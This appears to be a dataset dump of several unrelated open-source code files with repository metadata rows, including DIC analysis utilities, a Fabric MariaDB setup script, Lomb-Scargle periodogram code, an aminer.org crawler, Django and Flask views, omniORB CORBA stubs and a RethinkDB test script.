the total number of TCRs. Each pie shows the paired reads for a single mouse/epitope combination, with each wedge corresponding to
a clone. The size of the top clone is shown in red near the red wedge, and the total number of reads is shown below the pie in black.
""")
if show:
plt.show()
| mit | -1,046,512,849,625,852,400 | 31.360595 | 133 | 0.611832 | false | 2.993466 | false | false | false |
latture/dic | dic/dic_utils.py | 1 | 3905 | """
:mod:`dic_utils` contains several utility functions used when analyzing DIC data, e.g. determining the step size,
going from pixel to millimeter coordinates, and determining deformations.
"""
import numpy as np
import warnings
__all__ = ["get_step", "point_to_indices", "get_initial_position", "get_displacement", "point_to_position"]
def get_step(dic_data):
"""
Returns the step size of the DIC data
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
Returns
-------
int
Step size.
"""
return dic_data["x"][0, 1] - dic_data["x"][0, 0]
def point_to_indices(dic_data, pt):
"""
Transforms ``(x, y)`` in pixel coordinates into the corresponding ``(row, col)`` to access the closest data point
in the specified DIC data.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
pt : (x, y)
Two-dimensional coordinates of the pixel in global space.
Returns
-------
(row, col) : (int, int)
The row and column in ``dic_data`` that corresponds to the given pixel point.
"""
step = get_step(dic_data)
keys = ("y", "x")
indices = [None, None]
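    # the row index comes from the y-coordinate and the column from x, so
    # pt[(i + 1) % 2] pairs pt = (x, y) with keys = ("y", "x")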
for i, key in enumerate(keys):
min_key = '{}_min'.format(key)
if min_key in dic_data:
px_min = dic_data[min_key]
else:
px_min = dic_data[key].min()
px = pt[(i + 1) % 2]
indices[i] = int(round((px - px_min) / step))
return indices
def get_initial_position(dic_data, row, col):
"""
Retrieves the initial position (in mm if available, otherwise in pixels) held at the specified row and column.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
row : int
Row in the DIC data to access.
col : int
Column in the DIC data to access.
Returns
-------
``numpy.ndarray``
Initial position ``(x, y, z)``.
"""
try:
return np.array([dic_data["X"][row, col], dic_data["Y"][row, col], dic_data["Z"][row, col]])
except KeyError:
warnings.warn("Position data in millimeters not provided. Falling back to position in pixels.")
return np.array([dic_data["x"][row, col], dic_data["y"][row, col], dic_data["z"][row, col]])
def get_displacement(dic_data, row, col):
"""
Retrieves the displacement (in mm if available, otherwise in pixels) held at the specified row and column.
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
row : int
Row in the DIC data to access.
col : int
Column in the DIC data to access.
Returns
-------
``numpy.ndarray``
Displacements ``(u, v, w)``.
"""
try:
return np.array([dic_data["U"][row, col], dic_data["V"][row, col], dic_data["W"][row, col]])
except KeyError:
warnings.warn("Displacement data in millimeters not provided. Falling back to displacement in pixels.")
return np.array([dic_data["u"][row, col], dic_data["v"][row, col], dic_data["w"][row, col]])
def point_to_position(dic_data, pt, add_displacement=True):
"""
Transforms a point in pixel space into its displaced coordinates (in mm if available, otherwise in pixels).
Parameters
----------
dic_data : dict
Dictionary containing the DIC data.
pt : (x, y)
Two-dimensional coordinates of the pixel in global space.
add_displacement : bool, optional
Whether to add deformation to the undeformed position. Default is ``True``.
Returns
-------
``numpy.ndarray``
``(x, y, z)`` position of the point.
"""
row, col = point_to_indices(dic_data, pt)
pos = get_initial_position(dic_data, row, col)
if add_displacement:
pos += get_displacement(dic_data, row, col)
return pos
| mit | -2,652,472,472,064,460,300 | 28.360902 | 117 | 0.595134 | false | 3.754808 | false | false | false |
agabert/zeus | stages/mysql/fabfile.py | 1 | 1593 |
import os
from zeus.config import ConfigManager
from zeus.common import FabricManager
from zeus.common import PasswordManager
from zeus.ubuntu import RepoManager
from zeus.services import ServiceControl
from fabric.api import parallel, roles, run, env
metadata = ConfigManager(os.environ["CONFIGFILE"])
passwords = PasswordManager(os.environ["PASSWORDCACHE"]).passwords
FabricManager.setup(metadata.roles_ports)
@parallel
@roles('openstack_mysql')
def mysql():
RepoManager.install("mariadb-server")
RepoManager.install("python-pymysql")
this = env.host_string.split(":")[0]
run("""
IP="%s"
cat >/etc/mysql/mariadb.conf.d/51-openstack.cnf <<EOF
[mysqld]
bind-address = ${IP}
default-storage-engine = innodb
innodb_file_per_table
max_connections = 4096
collation-server = utf8_general_ci
character-set-server = utf8
init-connect='SET NAMES utf8'
[client]
default-character-set = utf8
[mysql]
default-character-set = utf8
EOF
""" % metadata.servers[this]["ip"])
ServiceControl.relaunch("mysql")
ServiceControl.check("mysqld")
for database in ["keystone", "glance", "nova_api", "nova", "neutron"]:
run("""
echo 'create database if not exists %s;' | mysql -uroot
""" % database)
run("""
cat <<EOF | mysql -uroot
GRANT ALL PRIVILEGES ON %s.* TO '%s'@'localhost' IDENTIFIED BY '%s';
EOF
""" % (database, database, passwords["%s_DBPASS" % database.upper()]))
run("""
cat <<EOF | mysql -uroot
GRANT ALL PRIVILEGES ON %s.* TO '%s'@'%%' IDENTIFIED BY '%s';
EOF
""" % (database, database, passwords["%s_DBPASS" % database.upper()]))
| apache-2.0 | -7,195,580,750,168,113,000 | 22.086957 | 74 | 0.697426 | false | 3.224696 | false | false | false |
wf4ever/ro-manager | src/MiscUtils/MockHttpResources.py | 1 | 2438 | # Utilities to mock HTTP resources for testing.
#
# with MockHttpFileResources(baseuri, path):
#   # test code here
# or
# with MockHttpDictResources(baseuri, resourcedict):
#   # test code here
#
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import urllib
import httpretty
import ScanDirectories
from FileMimeTypes import FileMimeTypes
FileType_MimeType = dict([ (ft,ct) for (ct, fts) in FileMimeTypes
for ft in fts ])
def HttpContentType(filename):
fsplit = filename.rsplit(".", 1)
if len(fsplit) == 2 and fsplit[1] in FileType_MimeType:
return FileType_MimeType[fsplit[1]]
return "application/octet-stream"
class MockHttpFileResources(object):
def __init__(self, baseuri, path):
self._baseuri = baseuri
self._path = path
return
def __enter__(self):
httpretty.enable()
# register stuff...
refs = ScanDirectories.CollectDirectoryContents(self._path, baseDir=self._path,
listDirs=False, listFiles=True, recursive=True)
for r in refs:
ru = self._baseuri + urllib.pathname2url(r)
rt = HttpContentType(r)
with open(self._path+r, 'r') as cf:
httpretty.register_uri(httpretty.GET, ru, status=200, content_type=rt,
body=cf.read())
httpretty.register_uri(httpretty.HEAD, ru, status=200, content_type=rt)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
suppress_exc = False
httpretty.disable()
return suppress_exc
class MockHttpDictResources(object):
def __init__(self, baseuri, resourcedict):
self._baseuri = baseuri
self._dict = resourcedict
return
def __enter__(self):
httpretty.enable()
# register stuff...
for r in self._dict.keys():
ru = self._baseuri + r
rt = HttpContentType(r)
httpretty.register_uri(httpretty.GET, ru, status=200, content_type=rt,
body=self._dict[r])
httpretty.register_uri(httpretty.HEAD, ru, status=200, content_type=rt)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
suppress_exc = False
httpretty.disable()
return suppress_exc
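# Example (sketch): one way MockHttpDictResources might be used in a test; the
# base URI and resource body below are illustrative assumptions only.
if __name__ == "__main__":
    resources = {"data/note.txt": "hello mock"}
    with MockHttpDictResources("http://example.org/", resources):
        body = urllib.urlopen("http://example.org/data/note.txt").read()
        assert body == "hello mock", "mocked GET did not return expected body"
    print "MockHttpDictResources example passed"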
# End.
| mit | 6,390,194,522,604,970,000 | 30.25641 | 88 | 0.599262 | false | 3.622585 | false | false | false |
drdangersimon/lomb_scargle | numpy_imp.py | 1 | 2279 | import numpy as np
import numexpr as ne
'''Numpy implementation of the Lomb-Scargle periodogram'''
def lombscargle_num(x, y, freqs):
# Check input sizes
if x.shape[0] != y.shape[0]:
raise ValueError("Input arrays do not have the same size.")
# Create empty array for output periodogram
pgram = np.empty(freqs.shape[0], dtype=np.float64)
for i in xrange(freqs.shape[0]):
c = np.cos(freqs[i] * x)
s = np.sin(freqs[i] * x)
xc = np.sum(y * c)
xs = np.sum(y * s)
cc = np.sum(c**2)
ss = np.sum(s**2)
cs = np.sum(c * s)
tau = np.math.atan2(2 * cs, cc - ss) / (2 * freqs[i])
c_tau = np.cos(freqs[i] * tau)
s_tau = np.sin(freqs[i] * tau)
c_tau2 = c_tau * c_tau
s_tau2 = s_tau * s_tau
cs_tau = 2 * c_tau * s_tau
pgram[i] = 0.5 * (((c_tau * xc + s_tau * xs)**2 / \
(c_tau2 * cc + cs_tau * cs + s_tau2 * ss)) + \
((c_tau * xs - s_tau * xc)**2 / \
(c_tau2 * ss - cs_tau * cs + s_tau2 * cc)))
return pgram
def lombscargle_ne(x, y, freqs):
'''uses numexp to do numpy stuff'''
# Check input sizes
if x.shape[0] != y.shape[0]:
raise ValueError("Input arrays do not have the same size.")
# Create empty array for output periodogram
pgram = np.empty(freqs.shape[0], dtype=np.float64)
for i in xrange(freqs.shape[0]):
f = freqs[i]
c = ne.evaluate('cos(f * x)')
s = ne.evaluate('sin(f * x)')
xc = ne.evaluate('sum(y * c)')
xs = ne.evaluate('sum(y * s)')
cc = ne.evaluate('sum(c**2)')
ss = ne.evaluate('sum(s**2)')
cs = ne.evaluate('sum(c * s)')
tau = ne.evaluate('arctan2(2 * cs, cc - ss) / (2. * f)')
c_tau = ne.evaluate('cos(f * tau)')
s_tau = ne.evaluate('sin(f * tau)')
c_tau2 = ne.evaluate('c_tau * c_tau')
s_tau2 = ne.evaluate('s_tau * s_tau')
cs_tau = ne.evaluate('2 * c_tau * s_tau')
pgram[i] = ne.evaluate('''0.5 * (((c_tau * xc + s_tau * xs)**2 /
(c_tau2 * cc + cs_tau * cs + s_tau2 * ss)) +
((c_tau * xs - s_tau * xc)**2 /
(c_tau2 * ss - cs_tau * cs + s_tau2 * cc)))''')
return pgram
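# Example (sketch): exercising both implementations on synthetic, unevenly
# sampled data; the signal and (angular) frequency grid below are illustrative
# assumptions, not part of the original module.
if __name__ == '__main__':
    t = np.sort(np.random.uniform(0, 10, 200))
    y = np.sin(2 * np.pi * 1.5 * t)
    freqs = 2 * np.pi * np.linspace(0.1, 5, 500)
    p_np = lombscargle_num(t, y, freqs)
    p_ne = lombscargle_ne(t, y, freqs)
    print 'peak at angular frequency:', freqs[p_np.argmax()]
    print 'implementations agree:', np.allclose(p_np, p_ne)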
| mit | -4,128,462,303,800,078,000 | 31.557143 | 73 | 0.48925 | false | 2.82404 | false | false | false |
x-web/social-network-user-influence-analysis | aminer/cralwer.py | 1 | 1916 | #!/usr/bin/python
# coding: utf-8
# crawling aminer.org data
__author__ = "x-web"
import sys
import urllib2
import json
import time
def fetchUser(start = 0, offset = 99, limit = 100, sleeptime = 3):
fwriter = open('user.json', 'w')
api = 'https://api.aminer.org/api/rank/person/h_index/'
errortime = 0
count = 1
while (start < limit):
curapi = api + str(start) + '/' + str(offset)
print 'fetch ' + curapi
try:
response = urllib2.urlopen(urllib2.Request(curapi))
data = response.read()
fwriter.write(data + "\n")
start = start + offset + 1
print str(count) + ' ok!'
except:
print str(count) + ' error!'
errortime += 1
if errortime > 3:
start = start + offset + 1
time.sleep(sleeptime)
count += 1
fwriter.close()
return
def fetchPub(sleeptime = 3, skip = 0):
freader = open('user.json', 'r')
fwriter = open('publication.json', 'w')
count = 0
for raw_data in freader:
json_array = json.loads(raw_data)
for user in json_array:
count += 1
            if count <= skip:
print 'pass ' + str(count)
continue
uid = user['id']
n_pubs = user['n_pubs']
api = 'https://api.aminer.org/api/person/pubs/' + str(uid) +'/all/year/0/' + str(n_pubs)
print 'fetch ' + api
try:
response = urllib2.urlopen(urllib2.Request(api))
data = response.read()
fwriter.write(data + "\n")
print str(count) + ' ok!'
except:
print str(count) + ' error!'
time.sleep(sleeptime)
freader.close()
fwriter.close()
return
if __name__ == '__main__':
# fetchUser(limit = 10000)
fetchPub()
print 'Done!'
| mit | 1,649,795,766,065,398,500 | 27.597015 | 100 | 0.505219 | false | 3.601504 | false | false | false |
CodeScaleInc/log4django | log4django/views/logrecord/__init__.py | 1 | 2055 | from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import TemplateView
from ...models import LogRecord, App
from ...settings import PAGE_SIZE
from ...decorators import authenticate
from .. import _filter_records
class LogRecordList(TemplateView):
template_name = 'log4django/bootstrap/logrecord/list.html'
http_method_names = ('get',)
@method_decorator(authenticate())
def get(self, request, *args, **kwargs):
logrecord_qs = _filter_records(request)
paginator = Paginator(logrecord_qs, PAGE_SIZE)
page = request.GET.get('page', None)
try:
records = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
records = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
records = paginator.page(paginator.num_pages)
# Getting filtering values.
apps = App.objects.all()
loggers = set([r.loggerName for r in records])
levels = LogRecord.LEVEL
return self.render_to_response(dict(
records=records, apps=apps, loggers=loggers, levels=levels,
filter_levels=[int(l) for l in request.GET.getlist('level')]
))
class LogRecordDetail(TemplateView):
template_name = 'log4django/bootstrap/logrecord/detail.html'
http_method_names = ('get',)
@method_decorator(authenticate())
def get(self, request, logrecord_id=None):
record = get_object_or_404(LogRecord, pk=logrecord_id)
related = None
if record.request_id:
related = LogRecord.objects.filter(
Q(request_id=record.request_id)
& ~Q(pk=record.pk)
)
return self.render_to_response(dict(
record=record, related=related
))
| bsd-3-clause | 2,427,831,677,460,595,000 | 35.052632 | 80 | 0.650122 | false | 3.967181 | false | false | false |
amonmoce/corba_examples | omniORBpy-4.2.1/build/python/COS/CosTypedNotifyComm_idl.py | 1 | 6759 | # Python stubs generated by omniidl from /usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl
# DO NOT EDIT THIS FILE!
import omniORB, _omnipy
from omniORB import CORBA, PortableServer
_0_CORBA = CORBA
_omnipy.checkVersion(4,2, __file__, 1)
try:
property
except NameError:
def property(*args):
return None
# #include "CosNotification.idl"
import CosNotification_idl
_0_CosNotification = omniORB.openModule("CosNotification")
_0_CosNotification__POA = omniORB.openModule("CosNotification__POA")
# #include "CosEventComm.idl"
import CosEventComm_idl
_0_CosEventComm = omniORB.openModule("CosEventComm")
_0_CosEventComm__POA = omniORB.openModule("CosEventComm__POA")
# #include "CosNotifyComm.idl"
import CosNotifyComm_idl
_0_CosNotifyComm = omniORB.openModule("CosNotifyComm")
_0_CosNotifyComm__POA = omniORB.openModule("CosNotifyComm__POA")
# #include "CosNotifyFilter.idl"
import CosNotifyFilter_idl
_0_CosNotifyFilter = omniORB.openModule("CosNotifyFilter")
_0_CosNotifyFilter__POA = omniORB.openModule("CosNotifyFilter__POA")
# #include "CosEventChannelAdmin.idl"
import CosEventChannelAdmin_idl
_0_CosEventChannelAdmin = omniORB.openModule("CosEventChannelAdmin")
_0_CosEventChannelAdmin__POA = omniORB.openModule("CosEventChannelAdmin__POA")
# #include "CosNotifyChannelAdmin.idl"
import CosNotifyChannelAdmin_idl
_0_CosNotifyChannelAdmin = omniORB.openModule("CosNotifyChannelAdmin")
_0_CosNotifyChannelAdmin__POA = omniORB.openModule("CosNotifyChannelAdmin__POA")
# #include "CosTypedEventComm.idl"
import CosTypedEventComm_idl
_0_CosTypedEventComm = omniORB.openModule("CosTypedEventComm")
_0_CosTypedEventComm__POA = omniORB.openModule("CosTypedEventComm__POA")
#
# Start of module "CosTypedNotifyComm"
#
__name__ = "CosTypedNotifyComm"
_0_CosTypedNotifyComm = omniORB.openModule("CosTypedNotifyComm", r"/usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl")
_0_CosTypedNotifyComm__POA = omniORB.openModule("CosTypedNotifyComm__POA", r"/usr/local/share/idl/omniORB/COS/CosTypedNotifyComm.idl")
# interface TypedPushConsumer
_0_CosTypedNotifyComm._d_TypedPushConsumer = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosTypedNotifyComm/TypedPushConsumer:1.0", "TypedPushConsumer")
omniORB.typeMapping["IDL:omg.org/CosTypedNotifyComm/TypedPushConsumer:1.0"] = _0_CosTypedNotifyComm._d_TypedPushConsumer
_0_CosTypedNotifyComm.TypedPushConsumer = omniORB.newEmptyClass()
class TypedPushConsumer (_0_CosTypedEventComm.TypedPushConsumer, _0_CosNotifyComm.NotifyPublish):
_NP_RepositoryId = _0_CosTypedNotifyComm._d_TypedPushConsumer[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosTypedNotifyComm.TypedPushConsumer = TypedPushConsumer
_0_CosTypedNotifyComm._tc_TypedPushConsumer = omniORB.tcInternal.createTypeCode(_0_CosTypedNotifyComm._d_TypedPushConsumer)
omniORB.registerType(TypedPushConsumer._NP_RepositoryId, _0_CosTypedNotifyComm._d_TypedPushConsumer, _0_CosTypedNotifyComm._tc_TypedPushConsumer)
# TypedPushConsumer object reference
class _objref_TypedPushConsumer (_0_CosTypedEventComm._objref_TypedPushConsumer, _0_CosNotifyComm._objref_NotifyPublish):
_NP_RepositoryId = TypedPushConsumer._NP_RepositoryId
def __init__(self, obj):
_0_CosTypedEventComm._objref_TypedPushConsumer.__init__(self, obj)
_0_CosNotifyComm._objref_NotifyPublish.__init__(self, obj)
omniORB.registerObjref(TypedPushConsumer._NP_RepositoryId, _objref_TypedPushConsumer)
_0_CosTypedNotifyComm._objref_TypedPushConsumer = _objref_TypedPushConsumer
del TypedPushConsumer, _objref_TypedPushConsumer
# TypedPushConsumer skeleton
__name__ = "CosTypedNotifyComm__POA"
class TypedPushConsumer (_0_CosTypedEventComm__POA.TypedPushConsumer, _0_CosNotifyComm__POA.NotifyPublish):
_NP_RepositoryId = _0_CosTypedNotifyComm.TypedPushConsumer._NP_RepositoryId
_omni_op_d = {}
_omni_op_d.update(_0_CosTypedEventComm__POA.TypedPushConsumer._omni_op_d)
_omni_op_d.update(_0_CosNotifyComm__POA.NotifyPublish._omni_op_d)
TypedPushConsumer._omni_skeleton = TypedPushConsumer
_0_CosTypedNotifyComm__POA.TypedPushConsumer = TypedPushConsumer
omniORB.registerSkeleton(TypedPushConsumer._NP_RepositoryId, TypedPushConsumer)
del TypedPushConsumer
__name__ = "CosTypedNotifyComm"
# interface TypedPullSupplier
_0_CosTypedNotifyComm._d_TypedPullSupplier = (omniORB.tcInternal.tv_objref, "IDL:omg.org/CosTypedNotifyComm/TypedPullSupplier:1.0", "TypedPullSupplier")
omniORB.typeMapping["IDL:omg.org/CosTypedNotifyComm/TypedPullSupplier:1.0"] = _0_CosTypedNotifyComm._d_TypedPullSupplier
_0_CosTypedNotifyComm.TypedPullSupplier = omniORB.newEmptyClass()
class TypedPullSupplier (_0_CosTypedEventComm.TypedPullSupplier, _0_CosNotifyComm.NotifySubscribe):
_NP_RepositoryId = _0_CosTypedNotifyComm._d_TypedPullSupplier[1]
def __init__(self, *args, **kw):
raise RuntimeError("Cannot construct objects of this type.")
_nil = CORBA.Object._nil
_0_CosTypedNotifyComm.TypedPullSupplier = TypedPullSupplier
_0_CosTypedNotifyComm._tc_TypedPullSupplier = omniORB.tcInternal.createTypeCode(_0_CosTypedNotifyComm._d_TypedPullSupplier)
omniORB.registerType(TypedPullSupplier._NP_RepositoryId, _0_CosTypedNotifyComm._d_TypedPullSupplier, _0_CosTypedNotifyComm._tc_TypedPullSupplier)
# TypedPullSupplier object reference
class _objref_TypedPullSupplier (_0_CosTypedEventComm._objref_TypedPullSupplier, _0_CosNotifyComm._objref_NotifySubscribe):
_NP_RepositoryId = TypedPullSupplier._NP_RepositoryId
def __init__(self, obj):
_0_CosTypedEventComm._objref_TypedPullSupplier.__init__(self, obj)
_0_CosNotifyComm._objref_NotifySubscribe.__init__(self, obj)
omniORB.registerObjref(TypedPullSupplier._NP_RepositoryId, _objref_TypedPullSupplier)
_0_CosTypedNotifyComm._objref_TypedPullSupplier = _objref_TypedPullSupplier
del TypedPullSupplier, _objref_TypedPullSupplier
# TypedPullSupplier skeleton
__name__ = "CosTypedNotifyComm__POA"
class TypedPullSupplier (_0_CosTypedEventComm__POA.TypedPullSupplier, _0_CosNotifyComm__POA.NotifySubscribe):
_NP_RepositoryId = _0_CosTypedNotifyComm.TypedPullSupplier._NP_RepositoryId
_omni_op_d = {}
_omni_op_d.update(_0_CosTypedEventComm__POA.TypedPullSupplier._omni_op_d)
_omni_op_d.update(_0_CosNotifyComm__POA.NotifySubscribe._omni_op_d)
TypedPullSupplier._omni_skeleton = TypedPullSupplier
_0_CosTypedNotifyComm__POA.TypedPullSupplier = TypedPullSupplier
omniORB.registerSkeleton(TypedPullSupplier._NP_RepositoryId, TypedPullSupplier)
del TypedPullSupplier
__name__ = "CosTypedNotifyComm"
#
# End of module "CosTypedNotifyComm"
#
__name__ = "CosTypedNotifyComm_idl"
_exported_modules = ( "CosTypedNotifyComm", )
# The end.
| mit | 2,434,784,445,631,023,000 | 41.778481 | 152 | 0.79065 | false | 3.084893 | false | false | false |
XDocker/Engine | xdocker/job/views.py | 1 | 3609 | from flask import Blueprint
from flask.ext.login import current_user, login_required
from ..helpers import check_args, make_response
from .helpers import get_job_log, get_job_status
from ..app_exceptions import PermissionDenied
job = Blueprint('job', __name__)
@job.route("/getLog/<job_id>", methods=["POST"])
@login_required
def get_log(job_id):
"""Get log for job
**Example request**
.. sourcecode:: http
POST /getLog/<job_id> HTTP/1.1
{
"token": "<token>",
"line_num": 10
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/json
Server: nginx/1.1.19
Vary: Accept-Encoding
{
"status": "OK",
"log": "<log lines>"
}
:jsonparam string token: Authentication token
:jsonparam integer line_num: Number of log lines to return(max 100, 10 default)
:statuscode 200: no error
:statuscode 401: not authorized
:>json string log: Last logs
"""
data = check_args()
log = get_job_log(data['username'], job_id)
return make_response(log=log)
@job.route("/getDeploymentStatus/<job_id>", methods=["POST"])
@login_required
def job_status(job_id):
"""Get job status
**Example request**
.. sourcecode:: http
POST /getDeploymentStatus/<job_id> HTTP/1.1
{
"token": "<token>"
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/json
Server: nginx/1.1.19
Vary: Accept-Encoding
{
"status": "OK",
"job_status": "Completed"
}
:jsonparam string token: Authentication token
:statuscode 200: no error
:statuscode 401: not authorized
:>json string job_status: Job status
"""
res_dict = get_job_status(job_id)
return make_response(**res_dict)
@job.route("/getStatusOfAllDeployments", methods=["POST"])
@login_required
def get_all_deployments():
"""Get job ids
**Example request**
.. sourcecode:: http
POST /getStatusOfAllDeployments HTTP/1.1
{
"token": "<token>",
}
**Example response**
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "OK",
"jobs": [
{
"job_id": "<job-id>",
"fail": true,
"fail_code": "BadPort",
"fail_message": "Wrong port: 20,",
"result": null,
"job_status": "failed"
}
]
}
:jsonparam string token: Authentication token
:statuscode 200: no error
:statuscode 401: not authorized
:>json array jobs: Statuses of user`s jobs
:>json string jobs.job_status: Status of user`s jobs(failed, Completed, started, null)
:>json boolean jobs.fail: whether it failed
:>json any jobs.result: job result
:>json string jobs.fail_code: fail code if failed
:>json string jobs.job_id: Job id
:>json string jobs.fail_message: fail message if failed
"""
statuses = []
for job_id in current_user.jobs:
try:
res_dict = get_job_status(job_id)
except PermissionDenied:
continue
if res_dict['job_status'] is None:
continue
res_dict['job_id'] = job_id
statuses.append(res_dict)
return make_response(jobs=statuses)
| apache-2.0 | 3,459,422,245,718,154,000 | 23.385135 | 90 | 0.563037 | false | 3.922826 | false | false | false |
TRManderson/petersen | petersen/app/users/__init__.py | 1 | 1244 | import flask
from flask import request, abort
from petersen.app.base import app
from petersen.models import User, UserBadge, Tag, needs_db
from sqlalchemy import or_
@app.route('/users', methods=['GET'])
@needs_db
def user_filter(db_session):
data = request.args
if data is None:
abort(400)
filters = []
for (k, v) in data.items():
if k == 'name':
filters.append(
User.name.like("%{}%".format(v))
)
elif k == 'tags':
filters.append(
or_(
*[
Tag.tag == t
for t in v.split(',')
]
)
)
elif k == 'badges':
filters.append(
or_(
*[
UserBadge.badge_id == t
for t in v.split(',')
]
)
)
else:
abort(400)
peeps = db_session.query(
User
).join(UserBadge, Tag).filter(
*filters
)
    resp = [p.to_json() for p in peeps]
return flask.jsonify(**{
'users': resp
})
| mit | -2,760,935,717,966,158,300 | 20.084746 | 58 | 0.39791 | false | 4.260274 | false | false | false |
isidorn/test2 | drivers/python/test.py | 1 | 5269 | import rethinkdb as r
c = r.connect(host='localhost', port=28015)
def tests():
print r.expr(1).run(c)
print r.expr("bob").run(c)
print r.expr(True).run(c)
print r.expr(False).run(c)
print r.expr(3.12).run(c)
print r.expr([1,2,3,4,5]).run(c)
print r.expr({'a':1, 'b':2}).run(c)
#print r.js('1 + 1').run(c)
print (r.expr(1) == 2).run(c) # false
print (r.expr(1) != 2).run(c) # true
print (r.expr(1) < 2).run(c) # true
print (r.expr(1) <= 2).run(c) # true
print (r.expr(1) > 2).run(c) # false
print (r.expr(1) >= 2).run(c) # false
print (~r.expr(True)).run(c) # false
print (~r.expr(False)).run(c) # true
print (r.expr(True).not_()).run(c) # false
print (r.expr(False).not_()).run(c) # true
print (r.expr(1) + 2).run(c) # 3
print (r.expr(1) - 2).run(c) # -1
print (r.expr(1) * 2).run(c) # 2
print (r.expr(1) / 2).run(c) # .5
print (r.expr(12) % 10).run(c) # 2
print (((r.expr(12) / 6) * 4) - 3).run(c) # 5
arr = r.expr([1,2,3,4])
print arr.append(5).run(c)
print arr[1].run(c)
print arr[2].run(c)
print arr[1:2].run(c)
print arr[:2].run(c)
print arr[2:].run(c)
print arr.count().run(c)
print arr.union(arr).run(c)
print arr.union(arr).distinct().run(c)
print arr.inner_join(arr, lambda a,b: a == b).run(c)
print arr.outer_join(arr, lambda a,b: a == (b - 2)).run(c)
#print r.expr([{'id':0, 'a':0}, {'id':1, 'a':0}]).eq_join([{'id':0, 'b':1}, {'id':1, 'b':1}], 'id').run(c)
obj = r.expr({'a':1, 'b':2})
print obj['a'].run(c)
print obj.contains('a').run(c)
print obj.pluck('a').run(c)
print obj.without('a').run(c)
print obj.merge({'c':3}).run(c)
print r.db_list().run(c)
print r.db_create('bob').run(c)
print r.db_create('test').run(c)
print r.db_list().run(c)
print r.db('test').table_list().run(c)
print r.db('test').table_create('test').run(c)
print r.db('test').table_create('bob').run(c)
print r.db('test').table_list().run(c)
print r.db('test').table_drop('bob').run(c)
print r.db('test').table_list().run(c)
test = r.db('test').table('test')
print test.run(c)
print test.insert({'id': 1, 'a': 2}).run(c)
print test.insert({'id': 2, 'a': 3}).run(c)
print test.insert({'id': 3, 'a': 4}).run(c)
print test.run(c)
print test.between(right_bound=2).run(c)
print test.update(lambda row: {'a': row['a']+1}).run(c)
print test.run(c)
print test.replace(lambda row: {'id':row['id'], 'a': row['a']+1}).run(c)
print test.run(c)
print test.delete().run(c)
print test.run(c)
print r.expr(1).do(lambda a: a + 1).run(c)
print r.expr(2).do(lambda a: {'b': a / a}).run(c)
print r.expr([1,2,3]).map(lambda a: a + 1).run(c)
print r.expr([1,2,3]).map(lambda a: a.do(lambda b: b+a)).run(c)
print r.expr([1,2,3]).reduce(lambda a, b: a+b).run(c)
print r.expr([1,2,3,4]).filter(lambda a: a < 3).run(c)
print r.expr([1,2]).concat_map(lambda a: [a,a]).run(c)
print r.branch(r.expr(1) < 2, "a", "b").run(c)
print r.branch(r.expr(1) < 0, "a", "b").run(c)
print (r.expr(True) & r.expr(False)).run(c)
print (r.expr(True) | r.expr(False)).run(c)
print (r.expr(True) & r.expr(True)).run(c)
print (r.expr(False) | r.expr(False)).run(c)
#print r.expr([1,2]).map(3).run(c)
#print r.expr([1,2]).map(r.row + 3).run(c)
print r.expr([{'id':2}, {'id':3}, {'id':1}]).order_by('id').run(c)
print r.expr([{'g':0, 'v':1}, {'g':0, 'v':2}, {'g':1, 'v':1}, {'g':1, 'v':2}]).grouped_map_reduce(lambda row: row['g'], lambda row: row['v'] + 1, lambda a,b: a + b).run(c)
#print r.expr([1,2]).for_each(lambda i: [test.insert({'id':i, 'a': i+1})]).run(c)
print test.run(c)
class except_printer:
def __enter__(self):
pass
def __exit__(self, typ, value, traceback):
print value
return True
def go():
with except_printer():
r.connect(host="localhost", port="123abc")
with except_printer():
r.expr({'err': r.error('bob')}).run(c)
with except_printer():
r.expr([1,2,3, r.error('bob')]).run(c)
with except_printer():
(((r.expr(1) + 1) - 8) * r.error('bob')).run(c)
with except_printer():
r.expr([1,2,3]).append(r.error('bob')).run(c)
with except_printer():
r.expr([1,2,3, r.error('bob')])[1:].run(c)
with except_printer():
r.expr({'a':r.error('bob')})['a'].run(c)
with except_printer():
r.db('test').table('test').filter(lambda a: a.contains(r.error('bob'))).run(c)
with except_printer():
r.expr(1).do(lambda x: r.error('bob')).run(c)
with except_printer():
r.expr(1).do(lambda x: x + r.error('bob')).run(c)
with except_printer():
r.branch(r.db('test').table('test').get(0)['a'].contains(r.error('bob')), r.expr(1), r.expr(2)).run(c)
with except_printer():
r.expr([1,2]).reduce(lambda a,b: a + r.error("bob")).run(c)
#with except_printer():
# r.expr([1,2,3]).do(lambda a: a.map(lambda b: a.filter(lambda c: (b + c) % a.reduce(base=9, lambda d, e: d / r.branch(e < 4, "bob", r.error('deep')))))).run(c)
for db in r.db_list().run(c):
r.db_drop(db).run(c)
tests()
go()
| agpl-3.0 | 5,220,351,879,085,170,000 | 34.126667 | 175 | 0.536155 | false | 2.484206 | true | false | false |
ActiveState/code | recipes/Python/578976_Objectify_of_a_XML_node/recipe-578976.py | 1 | 3154 | """
Tool for converting an XML node into an object instance.
.. module:: objectify
:platform: Unix, Windows
:synopsis: providing conversion for XML nodes.
.. moduleauthor:: Thomas Lehmann
License
=======
Copyright (c) 2014 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
